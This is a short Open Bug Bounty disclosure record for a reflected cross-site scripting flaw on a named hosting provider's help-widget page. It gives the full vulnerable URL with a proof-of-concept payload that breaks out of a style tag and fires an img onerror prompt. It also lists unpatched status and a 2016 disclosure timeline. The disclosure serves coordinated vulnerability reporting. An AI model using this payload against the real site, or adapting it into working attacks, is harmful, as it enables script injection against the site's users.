logo
DATABASE RESOURCES PRICING ABOUT US

help.lwspanel.com XSS vulnerability

Description

##### Vulnerable URL: https://help.lwspanel.com/contactwidget2?noTemplate=true&colorprimary;=04359C&widthContainer;=%22%3E%3C/style%3E%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3E ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 27.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated VIP website status:| No Check help.lwspanel.com SSL connection:| (Grade: C+) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 28 September, 2016 13:47 GMT Generic security notifications sent to website owner| 28 September, 2016 13:49 GMT Customized security notification sent to website owner| 28 September, 2016 13:49 GMT Notification sent to subscribers (without technical details)| 28 September, 2016 14:17 GMT Vulnerability details disclosed by researcher| 21 December, 2016 14:14 GMT